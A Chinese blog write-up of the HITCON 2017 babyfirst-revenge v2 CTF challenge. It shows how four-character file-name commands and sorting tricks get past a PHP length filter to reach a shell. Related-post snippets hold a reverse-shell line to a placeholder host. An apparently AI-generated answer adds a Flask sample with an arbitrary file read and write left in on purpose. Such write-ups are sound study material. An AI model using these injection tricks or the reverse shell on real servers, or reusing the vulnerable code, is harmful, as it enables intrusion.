HITCON 2017 babyfirst-revenge-v2(命令执行绕过五)

最新推荐文章于 2023-12-12 00:03:57 发布
最新推荐文章于 2023-12-12 00:03:57 发布
阅读量1.2k 收藏 1
点赞数
CC 4.0 BY-SA版权
分类专栏: WEB学习 文章标签: web ctf
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/like98k/article/details/80231894
本文详细解析了一道PHP CTF挑战题目,介绍了如何利用特殊命令和文件名排序技巧完成任务。通过构造特定的命令序列,实现了文件内容的精确写入,并最终获取shell权限。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

题目地址:https://github.com/otakekumi/CTF-Challenge/blob/master/PHP/chall_2/index.php

发现和上一题大体相似,但是发现有一个不一样,长度从5变成了4,没办法利用>>二次写入了。

但是我们如果就这样是没法儿按照字典序直接写入ls -t>g到文件的。 因为这一串无论怎么分割写入都无法遵从字典序或是字典序的逆序。

然后就不会了,想了n久还是不会,最后只有去看wp了。

首先介绍几个命令:

dir:虽然基本上和 ls 一样,但有两个好处,一是开头字母是d ,这使得它在 alphabetical 序中靠前,二是按列输出,不换行。

* :相当于$(dir *),所以说如果文件名如果是命令的话就会返回执行的结果,之后的作为参数传入.

rev:可以反转文件每一行的内容。

所以这样如果dir在最前面的话,就可以把当前目录的文件都返回.

>dir
>sl
>g\>
>ht-

之后将*的结果写入文件中,紧接着写入rev文件.

>*>v
>rev


最后执行rev v>u,这个命令需要通过*命令的其它形式实现.

*v>u
这个命令就是$(dir *v)>u,dir *v返回的就是结尾为v的文件.


这个地方其实是一个很巧妙的方式,因为*v恰好是可以匹配到revv的,如果文件名换成其它字母会因为排序错误或者没有作为rev的参数而逆序失败.
之后的步骤就没有什么多大的区别了.

基本上就前面的写文件操作不一样。

exp执行,getshell!

参考链接:https://xz.aliyun.com/t/1579

HITCON2017 babyfirst-revenge v2
forbidd3n,keep going
05-22 657
被5虐过后,现在到4了,没想到难度大很多,这些就记一下总结下来的方法和姿势。先总结ls -t的方法,后面再补充tar的姿势。 1、构造ls -t 在上一题中我们大概知道了构造ls -t的要素,但是在本题中,由于长度的进一步限制,`ls>>_`将无法使用。这就要使用到其他技巧。 技巧0:* 在当前工作目录下使用*命令,会将目录名当作命令执行(顺序) 执行*即-t ...
Hitcon2017 babyfirst-revenge v2复现
0verWatch的博客
09-18 1175
这个题目的条件更加苛刻了,先放个源码 <?php $sandbox = '/www/sandbox/' . md5("orange" . $_SERVER['REMOTE_ADDR']); @mkdir($sandbox); @chdir($sandbox); if (isset($_GET['cmd']) && strlen($_GET['c...
HITCON2017 babyfirst-revenge
forbidd3n,keep going
07-01 3488
初看这题,完全没有思路???!!!没辙,只能找大佬,看了网上各路大神的思路,从看不懂writeup到慢慢理解原理,学习了~多数writeup思路差不多,总归是利用\来多次输入命令,绕过长度限制,有的人直接curl xxx(不用ls -t这个我没有成功,因为是在构造不出ip地址各种进制的序列问题),痛苦~~关键一:绕过5位长度限制要想绕过长度限制执行多条命令,显然会想到先将命令放到文件中取执行。第一...
Babyfirst-Revenge
Da2kSupr3m3的博客
01-03 739
[HITCON 2017]Babyfirst-Revenge v1&v2
HITCON 2017 babyfirst-revenge命令执行绕过四)
郁离歌丶的博客
05-03 761
中午睡了一觉,醒来两点多了,发现几个群里又有人在黑我这个萌新菜比了.....然后用两个多小时ak了iscc放的题,这让我忍不住再次喷一波iscc...老子都ak了排名还5、60名...就因为昨天写红帽杯要交的wp没打....我真tm无语...算了算了不喷了。开始今天的修炼!在远程放好如下内容:bash -c "bash -i >& /dev/tcp/vpsip/vpsport 0&l...
Hitcon2017 babyfirst-revenge复现
0verWatch的博客
09-06 2993
前言 开学了还是得学习的,复现一波题目来玩玩,其实是实力不够不能去打网鼎杯emmm 正文 先从Hitcon2017 babyfirst-revenge这一个题目,总结一下还是学到很多东西的 复现地址 https://github.com/Pr0phet/hitconDockerfile/tree/master/hitcon-ctf-2017/babyfirst-revenge 这是题目回...
HITCON CTF 2017
11-08
HITCON CTF 2017 所有题目整理...............................................................................................................................................................................
BabyFirst-Revenge
heySister
09-15 921
前几天做ctf交流群的入门题…然后顺着就找到了BabyFirst系列的题目,所以打算做一做。 首先,参考了https://www.jianshu.com/p/a77e956d9941 ,里面也有对应HITCON各年比赛的docker环境,方便复现题目。 打开页面,代码很短,而且就很直白地告诉我们,这里可以有命令执行,就看能不能绕过。 <?php $sandbox = '/w...
HITCON2017 BabyFirst Revenge (短命令执行
a3320315的博客
01-12 1036
0x01 源码 <?php $sandbox = '/www/sandbox/' . md5("orange" . $_SERVER['REMOTE_ADDR']); @mkdir($sandbox); @chdir($sandbox); if (isset($_GET['cmd']) && strlen($_GET['cmd']) <=...
HITCON 2017 babyfirst-revenge命令执行绕过二)
郁离歌丶的博客
04-30 1081
昨天不知道怎么了忘记发出去了,和今天的合起来一起发23333333今天国赛,体验了一把被二进制大手子带飞的感觉。贼爽。web1太简单,web2太难,web+pwn我就没做出来过。然后国赛也成为二进制的舞台了(就好像什么比赛不是二进制的天下一样。所以我这只狗又来学web了。接上昨天的,我想本地搭一个,但是想了好久,到底怎么弄,我想看看实现好的环境。搜一波发现有人用docker搭过了。但是我是win1...
HCTF2017-Web-Writeup
dengzhasong7076的博客
11-14 4397
boring website 先通过扫描得到: http://106.15.53.124:38324/www.zip <?php echo "Bob received a mission to write a login system on someone else's server, and he he only finished half of the work<br /...
Babyfirst的分析和解答
qq_41281571的博客
08-25 532
解题报告 本地环境搭建的时候,要把php.ini里的disable_function:后面的exec给去掉,不然就不能执行exec()函数。 去掉以后,要重启一下php-fpm: ststemctl restart php-fpm wget 命令:从指定的服务器IP下载文件 解题: 审计代码: 读完代码后发现服务器将会给每个客户端ip以IP号在当前目录下(www下面)的sandbox...
CTF-web 第十三部分 命令注入
热门推荐
iamsongyu的博客
11-25 1万+
一 、基本原理 命令注入指的是,利用没有验证过的恶意命令或代码,对网站或服务器进行渗透攻击。 注入有很多种,并不仅仅只有SQL注入。比如: 命令注入(Command Injection) Eval 注入(Eval Injection) 客户端脚本攻击(Script Insertion) 跨网站脚本攻击(Cross Site Scripting, XSS) SQL 注入攻击(SQL ...
命令注入突破长度限制 | 从CTF题目讲起
纸房子
12-03 7381
在命令注入中往往会存在注入命令的长度过短的情况,无法将全部命令完全的输入进去,这种情况下就需要我们来想办法突破系统命令长度的限制。我们从三道CTF题目来讲解一下这种渗透策略。一.BabyfirstSovled: 33 / 969 Difficulty: ★★ Tag: WhiteBox, PHP, Command InjectionIdeaUse NewLine to bypass regula
实力分割模型的复现:Windows下的DeepLabv2 tensorflow模型:tensorflow-deeplab-resnet的复现
Exploer_TRY的博客
12-20 2254
​​​​此博客为博主在复现模型时的记录,好处是问题比较全面,缺点是语言表述可能不够清晰。 最近需要用到实力分割模型,之前介于mask rcnn的运行速度过慢,所以这次为了练手,选择了这个实力分割的模型。 地址:https://github.com/DrSleep/tensorflow-deeplab-resnet#after-training-i-have-multiple-files-tha...
模拟cisp-pte 第四题 命令执行
小明师傅博客
06-14 3195
输入127.0.0.1 | find / -name “key.php” 找到文件位置,php文件不可以直接读 tac /app/key.php 用tac读php文件 成功
命令执行RCE及其绕过详细总结(各情景下的绕过
2301_76690905的博客
12-12 1万+
scandir() :将返回当前目录中的所有文件和目录的列表。返回的结果是一个数组,其中包含当前目录下的所有文件和目录名称(glob()可替换)localeconv() :返回一包含本地数字及货币格式信息的数组。(但是这里数组第一项就是‘.’,这个.的用处很大)current() :返回数组中的单元,默认取第一个值。pos()和current()是同一个东西getcwd() :取得当前工作目录dirname():函数返回路径中的目录部分。
[HITCON 2017]SSRFme 1
最新发布
03-30
### HITCON 2017 SSRF Challenge Overview The **HITCON 2017 CTF** featured a variety of challenges, including those related to Server-Side Request Forgery (SSRF). These challenges were designed to test participants' understanding of web application vulnerabilities and their ability to exploit them effectively. One notable challenge was the **SSRFme task**, which involved exploiting an SSRF vulnerability within a PHP-based system. The provided code snippet demonstrates how the `$_SERVER['HTTP_X_FORWARDED_FOR']` variable is manipulated by splitting its value using commas as delimiters[^5]. This manipulation allows attackers to control the `$http_x_headers[0]` value, potentially leading to unauthorized access or command execution scenarios. In another instance, contestants had to leverage file-writing capabilities through GET requests combined with filename parameters[^4]. By carefully crafting filenames that included shell commands such as `/readflag`, they could execute arbitrary commands on the server side. Specifically: - A request like `/?url=/&filename=aaa` would create a new file named after the specified parameter. - Subsequent exploitation steps allowed reading sensitive files from restricted directories via crafted URLs incorporating malicious payloads into both query strings (`?`) and headers. Additionally, there exists documentation regarding similar exercises where users reconstruct past competitions’ problems locally for practice purposes—such efforts often involve setting up Docker containers mimicking original environments accurately so learners may gain hands-on experience without needing direct participation during actual events themselves[^1]. For further exploration beyond just theoretical knowledge about these types of attacks but also practical implementations thereof consider reviewing additional resources discussing advanced techniques surrounding path traversal exploits alongside other common injection vectors present throughout modern-day applications today too! ```python import os from flask import Flask, request app = Flask(__name__) @app.route('/') def index(): url = request.args.get('url', '') filename = request.args.get('filename', 'default.txt') try: response = open(url) # Vulnerable line due to lack of validation content = response.read() with open(f"/tmp/{filename}", "w") as f: f.write(content) return f"Content written successfully to {filename}" except Exception as e: return str(e), 400 if __name__ == '__main__': app.run(debug=True) ```
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值